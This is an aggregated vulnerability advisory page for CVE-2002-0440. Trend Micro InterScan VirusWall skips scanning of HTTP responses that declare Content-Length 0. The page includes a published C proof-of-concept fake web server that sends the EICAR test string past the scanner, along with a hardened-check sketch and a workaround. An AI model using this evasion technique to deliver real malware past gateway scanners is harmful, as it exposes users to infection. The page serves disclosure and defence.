CVE-2002-0440
CVSS 7.5
Published: 2002-07-26 00:00:00
Revised: 2008-09-10 15:12:04

[Original] Trend Micro InterScan VirusWall HTTP proxy 3.6 with the "Skip scanning if Content-length equals 0" option enabled allows malicious web servers to bypass content scanning via a Content-length header set to 0, which is often ignored by HTTP clients.


[CNNVD] Trend Micro InterScan VirusWall Content-Length field scan bypass vulnerability (CNNVD-200207-112)

        
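Trend Micro InterScan VirusWall is a high-performance Internet gateway virus scanner that scans inbound HTTP, SMTP and FTP traffic for viruses and malicious code.
Because Trend Micro InterScan VirusWall does not handle the Content-length field thoroughly, malicious code or viruses can bypass the scanning performed by this virus wall.
In some versions, an option called "Skip scanning if Content-length equals 0" is enabled by default. A malicious web server can return content carrying a virus or malicious code to the client with the Content-length field set to 0, and that content bypasses the virus wall's scanning. Most popular client programs ignore this header and display the content, so the embedded malicious code evades the virus wall's detection and executes on the client.
Other VirusWall versions may have this vulnerability, but this has not been confirmed.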
        

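- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]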

- CPE (affected platforms and products)

cpe:/a:trend_micro:interscan_viruswall:3.6
cpe:/a:trend_micro:interscan_viruswall:3.51

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0440
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0440
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-112
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/4265
(VENDOR_ADVISORY)  BID  4265
http://www.iss.net/security_center/static/8425.php
(UNKNOWN)  XF  interscan-viruswall-http-proxy-bypass(8425)
http://www.inside-security.de/vwall_cl0.html
(UNKNOWN)  MISC  http://www.inside-security.de/vwall_cl0.html
http://seclists.org/lists/bugtraq/2002/Mar/0162.html
(UNKNOWN)  BUGTRAQ  20020311 VirusWall HTTP proxy content scanning circumvention

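- Vulnerability information

Trend Micro InterScan VirusWall Content-Length field scan bypass vulnerability
High risk  Other
2002-07-26 00:00:00 2005-10-20 00:00:00
Remote

Trend Micro InterScan VirusWall is a high-performance Internet gateway virus scanner that scans inbound HTTP, SMTP and FTP traffic for viruses and malicious code.
Because Trend Micro InterScan VirusWall does not handle the Content-length field thoroughly, malicious code or viruses can bypass the scanning performed by this virus wall.
In some versions, an option called "Skip scanning if Content-length equals 0" is enabled by default. A malicious web server can return content carrying a virus or malicious code to the client with the Content-length field set to 0, and that content bypasses the virus wall's scanning. Most popular client programs ignore this header and display the content, so the embedded malicious code evades the virus wall's detection and executes on the client.
Other VirusWall versions may have this vulnerability, but this has not been confirmed.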
        

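- Advisories and patches

Workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* In the VirusWall web management interface, deselect the "Skip scanning if Content-length equals 0" option in the HTTP proxy configuration. With this option turned off, some sites will display more slowly; in that case the "server timeout" value in the advanced configuration needs to be set to a smaller value.
Vendor patch:
Trend Micro
-----------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: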
        
        http://www.antivirus.com/

- Vulnerability information (21339)

Trend Micro InterScan VirusWall 3.5/3.6 Content-Length Scan Bypass Vulnerability (EDBID:21339)
multiple remote
2002-03-11 Verified
0 Jochen Thomas Bauer
N/A
source: http://www.securityfocus.com/bid/4265/info

Trend Micro InterScan VirusWall is a high performance internet gateway virus scanning package. It is capable of scanning incoming content over HTTP, SMTP and FTP for viruses and malicious code.

A vulnerability has been reported in some versions of VirusWall. An option exists called "Skip scanning if Content-length equals 0", which is enabled by default. A malicious web server may return infected content with this header set to 0, and bypass the VirusWall scanner. As many popular client programs will ignore this header and display the content, this may allow malicious content to bypass VirusWall and still be interpreted by a client system.

Other versions of VirusWall may share this vulnerability. This has not been confirmed. 

/*
Trend Micro InterScan VirusWall HTTP proxy content scanning circumvention proof of concept code

Copyright 2002 Jochen Bauer, Inside Security IT Consulting GmbH <jtb@inside-security.de>
Compiled and tested on SuSE Linux 7.3
This program is for testing purposes only, any other use is prohibited!
*/

#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/wait.h>

#define BUFFERSIZE 4096

int main(int argc,char *argv[])
{
  int new,n,s;
  unsigned short port;
  struct sockaddr_in remote,local; 
  socklen_t dummy=sizeof(remote); /*in/out address length for accept(); must be initialized*/
  struct in_addr remote_ip;
  char *remote_host,*recvbuffer,*sendbuffer;

  char header[]="HTTP/1.0 200 OK\r\nConnection: close\r\nContent-Type: application/binary\r\nContent-Length: 0\r\n\r\n";
  char eicar[]="X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";  

  /*get port number from cmdline*/
  if(argv[1]==NULL)
    {
      printf("Usage: %s port\n",argv[0]);
      exit(1);
    }  
  else
    port=atoi(argv[1]);

  printf("Fake web server starting......\n");

  /*get a socket*/
  s=socket(AF_INET,SOCK_STREAM,6);
  if(s<0)
    {
      perror("socket");
      exit(-1);
    }
  
  /*bind socket to a local port*/
  local.sin_family=AF_INET;
  local.sin_port=htons(port);
  local.sin_addr.s_addr=htonl(INADDR_ANY);
  n=bind(s,(struct sockaddr *)&local,sizeof(struct sockaddr));
  if(n<0)
    {
      perror("bind");
      exit(-1);
    }
  
  /*initiate listening on socket*/
  n=listen(s,5);
  if(n<0)
    {
      perror("listen");
      exit(-1);
    }
  printf("Listening on port %i/tcp\n",port);
  
  /*accept connections on socket*/
  new=accept(s,(struct sockaddr *)&remote,&dummy);
  if(new<0)
    {
      perror("accept");
      exit(-1);
    }
     
  /*print connection info*/
  remote_host=(char *)calloc(24,1);
  remote_ip.s_addr=remote.sin_addr.s_addr;
  strncpy(remote_host,inet_ntoa(remote_ip),24);
  printf("connection from: %s\n",remote_host);

  /*get data*/
  recvbuffer=calloc(BUFFERSIZE,1);
  n=recv(new,recvbuffer,BUFFERSIZE-1,0); /*leave room for the terminator*/
  if(n<0)
    {
      perror("recv");
      exit(-1);
    }
  recvbuffer[n]=0; /*terminate string*/
  printf("\nData from Browser:\n"); 
  printf("%s\n",recvbuffer);

  /*send eicar virus*/
  sendbuffer=calloc(BUFFERSIZE,1);
  strcat(sendbuffer,header);
  strcat(sendbuffer,eicar);
  printf("sending: \n%s\n",sendbuffer);
  n=write(new,sendbuffer,strlen(sendbuffer));

  /*clean up*/
  printf("Terminating.\n");
  close(new);
  close(s);
  return(0);
}
		

- Vulnerability information

6162
Trend Micro InterScan VirusWall HTTP Proxy Content Scanning Circumvention
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2002-03-10 Unknown
2002-03-10 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Trend Micro InterScan VirusWall Content-Length Scan Bypass Vulnerability
Failure to Handle Exceptional Conditions 4265
Yes No
2002-03-11 12:00:00 2009-07-11 11:56:00
Credited to Jochen Thomas Bauer <jtb@inside-security.de> and Boris Wesslowski <bw@inside-security.de> of Inside Security GmbH.

- Affected program versions

Trend Micro InterScan VirusWall for Windows NT 3.51
- Microsoft Windows NT 3.5.1 SP5
- Microsoft Windows NT 3.5.1 SP4
- Microsoft Windows NT 3.5.1 SP3
- Microsoft Windows NT 3.5.1 SP2
- Microsoft Windows NT 3.5.1 SP1
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5
Trend Micro Interscan Viruswall (Solaris) 3.6
Trend Micro Interscan Viruswall (Linux) 3.6
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- Turbolinux Turbolinux 6.1
Trend Micro Interscan Viruswall (HP-UX) 3.6

- Vulnerability discussion

Trend Micro InterScan VirusWall is a high performance internet gateway virus scanning package. It is capable of scanning incoming content over HTTP, SMTP and FTP for viruses and malicious code.

A vulnerability has been reported in some versions of VirusWall. An option exists called "Skip scanning if Content-length equals 0", which is enabled by default. A malicious web server may return infected content with this header set to 0, and bypass the VirusWall scanner. As many popular client programs will ignore this header and display the content, this may allow malicious content to bypass VirusWall and still be interpreted by a client system.

Other versions of VirusWall may share this vulnerability. This has not been confirmed.
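
The skip decision described above, set beside a hardened form, as an added example (not code from the advisory, the vendor, or Inside Security). Function names and the sample responses are constructed for illustration, and the sketch assumes the complete response sits in one NUL-terminated buffer.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Constructed samples (not captured traffic); both are NUL-terminated. */
static const char sample_mismatch[] =   /* declares 0 bytes, carries a body */
  "HTTP/1.0 200 OK\r\nContent-Length: 0\r\n\r\nBODY-THE-CLIENT-STILL-READS";
static const char sample_empty[] =      /* genuinely empty response */
  "HTTP/1.0 200 OK\r\nContent-Length: 0\r\n\r\n";

/* Case-insensitive match of a lowercase header name at the start of a line. */
static int name_is(const char *line, const char *lower_name, size_t n)
{
  while (n--)
    if (tolower((unsigned char)*line++) != *lower_name++) return 0;
  return 1;
}

/* Declared Content-Length, or -1 if the header is absent or malformed
   (an empty value, or one parsed from beyond its own line, is malformed). */
long declared_length(const char *resp, size_t len)
{
  const char *end = resp + len, *line = resp;
  while (line < end) {
    const char *eol = memchr(line, '\n', (size_t)(end - line));
    if (!eol || eol == line || (eol == line + 1 && *line == '\r'))
      break;                            /* blank line: end of headers */
    if (eol - line > 15 && name_is(line, "content-length:", 15)) {
      char *stop;
      long v = strtol(line + 15, &stop, 10);
      return (stop == line + 15 || stop > eol || v < 0) ? -1 : v;
    }
    line = eol + 1;
  }
  return -1;
}

/* Bytes actually present after the blank line that ends the headers. */
size_t body_bytes(const char *resp, size_t len)
{
  const char *p = strstr(resp, "\r\n\r\n");
  return p ? len - (size_t)(p + 4 - resp) : 0;
}

/* Skip decision as the advisory describes the option: the header alone decides. */
int skip_scan_header_only(const char *resp, size_t len)
{ return declared_length(resp, len) == 0; }
/* Hardened decision: skip only when nothing at all follows the headers. */
int skip_scan_checked(const char *resp, size_t len)
{ return declared_length(resp, len) == 0 && body_bytes(resp, len) == 0; }
```

In a streaming proxy the hardened check only means something once the upstream response is complete (for example at connection close), because body bytes can arrive after the headers.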

- Exploit

No exploit is required.

A demo server has been provided by Inside Security GmbH:

http://www.inside-security.de/vwall_cl0_poc.html

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
